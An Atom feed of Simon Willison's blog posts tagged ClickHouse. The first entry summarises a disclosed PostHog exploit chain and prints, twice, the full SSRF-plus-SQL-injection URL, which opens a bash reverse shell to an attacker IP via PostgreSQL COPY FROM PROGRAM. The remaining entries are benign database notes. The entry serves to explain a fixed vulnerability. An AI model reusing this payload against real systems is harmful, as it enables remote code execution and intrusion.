<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: clickhouse</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/clickhouse.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2025-12-18T01:42:22+00:00</updated><author><name>Simon Willison</name></author><entry><title>Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain</title><link href="https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag" rel="alternate"/><published>2025-12-18T01:42:22+00:00</published><updated>2025-12-18T01:42:22+00:00</updated><id>https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mdisec.com/inside-posthog-how-ssrf-a-clickhouse-sql-escaping-0day-and-default-postgresql-credentials-formed-an-rce-chain-zdi-25-099-zdi-25-097-zdi-25-096/"&gt;Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.&lt;/p&gt;
&lt;p&gt;The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.&lt;/p&gt;
&lt;p&gt;Here's the URL that gets injected:&lt;/p&gt;
&lt;p&gt;&lt;code style="word-break: break-all"&gt;http://clickhouse:8123/?query=SELECT+&lt;em&gt;+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+&amp;gt;%26+/dev/tcp/172.31.221.180/4444+0&amp;gt;%261\\"$$;SELECT+&lt;/em&gt;+FROM+cmd_exec;+--\",'posthog','posthog')#&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Reformatted a little for readability:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i &amp;gt;&amp;amp; /dev/tcp/172.31.221.180/4444 0&amp;gt;&amp;amp;1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This abuses ClickHouse's ability to &lt;a href="https://clickhouse.com/docs/sql-reference/table-functions/postgresql#implementation-details"&gt;run its own queries against PostgreSQL&lt;/a&gt; using the &lt;code&gt;postgresql()&lt;/code&gt; table function, combined with an escaping bug in ClickHouse PostgreSQL function (&lt;a href="https://github.com/ClickHouse/ClickHouse/pull/74144"&gt;since fixed&lt;/a&gt;). Then &lt;em&gt;that&lt;/em&gt; query abuses PostgreSQL's ability to run shell commands via &lt;code&gt;COPY ... FROM PROGRAM&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;bash -c&lt;/code&gt; bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=46305321"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webhooks"&gt;webhooks&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="security"/><category term="sql"/><category term="sql-injection"/><category term="webhooks"/><category term="clickhouse"/></entry><entry><title>ClickHouse gets lazier (and faster): Introducing lazy materialization</title><link href="https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag" rel="alternate"/><published>2025-04-22T17:05:33+00:00</published><updated>2025-04-22T17:05:33+00:00</updated><id>https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://clickhouse.com/blog/clickhouse-gets-lazier-and-faster-introducing-lazy-materialization"&gt;ClickHouse gets lazier (and faster): Introducing lazy materialization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Tom Schreiber describe's the latest optimization in ClickHouse, and in the process explores a whole bunch of interesting characteristics of columnar datastores generally.&lt;/p&gt;
&lt;p&gt;As I understand it, the new "lazy materialization" feature means that if you run a query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select id, big_col1, big_col2
from big_table order by rand() limit 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Those &lt;code&gt;big_col1&lt;/code&gt; and &lt;code&gt;big_col2&lt;/code&gt; columns won't be read from disk for every record, just for the five that are returned. This can dramatically improve the performance of queries against huge tables - for one example query ClickHouse report a drop from "219 seconds to just 139 milliseconds—with 40× less data read and 300× lower memory usage."&lt;/p&gt;
&lt;p&gt;I'm linking to this mainly because the article itself is such a detailed discussion of columnar data patterns in general. It caused me to update my intuition for how queries against large tables can work on modern hardware. This query for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT helpful_votes
FROM amazon.amazon_reviews
ORDER BY helpful_votes DESC
LIMIT 3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can run in 70ms against a 150 million row, 70GB table - because in a columnar database you only need to read that &lt;code&gt;helpful_votes&lt;/code&gt; integer column which adds up to just 600MB of data, and sorting 150 million integers on a decent machine takes no time at all.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43763688"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="clickhouse"/></entry><entry><title>GitHub Public repo history tool</title><link href="https://simonwillison.net/2024/Mar/20/github-public-repo-history/#atom-tag" rel="alternate"/><published>2024-03-20T21:56:12+00:00</published><updated>2024-03-20T21:56:12+00:00</updated><id>https://simonwillison.net/2024/Mar/20/github-public-repo-history/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://observablehq.com/@simonw/github-public-repo-history"&gt;GitHub Public repo history tool&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I built this Observable Notebook to run queries against the GH Archive (via ClickHouse) to try to answer questions about repository history—in particular, were they ever made public as opposed to private in the past.&lt;/p&gt;

&lt;p&gt;It works by combining together PublicEvent event (moments when a private repo was made public) with the most recent PushEvent event for each of a user’s repositories.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://til.simonwillison.net/clickhouse/github-public-history"&gt;TIL: Reviewing your history of public GitHub repositories using ClickHouse&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable"&gt;observable&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="github"/><category term="projects"/><category term="observable"/><category term="clickhouse"/></entry><entry><title>chDB</title><link href="https://simonwillison.net/2023/Oct/24/chdb/#atom-tag" rel="alternate"/><published>2023-10-24T23:04:55+00:00</published><updated>2023-10-24T23:04:55+00:00</updated><id>https://simonwillison.net/2023/Oct/24/chdb/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/chdb-io/chdb"&gt;chDB&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
This is a really interesting development: chDB offers “an embedded SQL OLAP Engine” as a Python package, which you can install using “pip install chdb”. What you’re actually getting is a wrapper around ClickHouse—it’s almost like ClickHouse has been repackaged into an embedded database similar to SQLite.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://auxten.com/the-birth-of-chdb/"&gt;The birth of chDB&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="python"/><category term="clickhouse"/></entry><entry><title>Lesser Known Features of ClickHouse</title><link href="https://simonwillison.net/2022/May/31/lesser-known-features-of-clickhouse/#atom-tag" rel="alternate"/><published>2022-05-31T19:48:57+00:00</published><updated>2022-05-31T19:48:57+00:00</updated><id>https://simonwillison.net/2022/May/31/lesser-known-features-of-clickhouse/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://pradeepchhetri.xyz/clickhouselesserknownfeatures/#run-clickhouse-as-http-server-with-custom-static-and-dynamic-handlers"&gt;Lesser Known Features of ClickHouse&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I keep hearing positive noises about ClickHouse. I learned about a whole bunch of capabilities from this article—including that ClickHouse can directly query tables that are stored in SQLite or PostgreSQL.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=31561780"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="sqlite"/><category term="clickhouse"/></entry><entry><title>Clickhouse on Cloud Run</title><link href="https://simonwillison.net/2021/Jul/29/clickhouse-on-cloud-run/#atom-tag" rel="alternate"/><published>2021-07-29T06:07:51+00:00</published><updated>2021-07-29T06:07:51+00:00</updated><id>https://simonwillison.net/2021/Jul/29/clickhouse-on-cloud-run/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://alexjreid.dev/posts/clickhouse-on-cloud-run/"&gt;Clickhouse on Cloud Run&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Alex Reid figured out how to run Clickhouse against read-only baked data on Cloud Run last year, and wrote up some comprehensive notes.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/alexjreid/status/1420625467384737797"&gt;@alexjreid&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cloudrun"&gt;cloudrun&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/baked-data"&gt;baked-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="cloudrun"/><category term="baked-data"/><category term="clickhouse"/></entry><entry><title>Everything You Always Wanted To Know About GitHub (But Were Afraid To Ask)</title><link href="https://simonwillison.net/2021/Jan/5/clickhouse-github/#atom-tag" rel="alternate"/><published>2021-01-05T01:02:40+00:00</published><updated>2021-01-05T01:02:40+00:00</updated><id>https://simonwillison.net/2021/Jan/5/clickhouse-github/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://gh.clickhouse.tech/explorer/"&gt;Everything You Always Wanted To Know About GitHub (But Were Afraid To Ask)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
ClickHouse by Yandex is an open source column-oriented data warehouse, designed to run analytical queries against TBs of data. They've loaded the full GitHub Archive of events since 2011 into a public instance, which is a great way of both exploring GitHub activity and trying out ClickHouse. Here's a query I just ran that shows number of watch events per year, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT toYear(created_at) as yyyy, count()
FROM github_events
WHERE event_type = 'WatchEvent' group by yyyy
&lt;/code&gt;&lt;/pre&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=25638853"&gt;A Hacker News comment&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/analytics"&gt;analytics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/big-data"&gt;big-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="analytics"/><category term="github"/><category term="sql"/><category term="big-data"/><category term="clickhouse"/></entry></feed>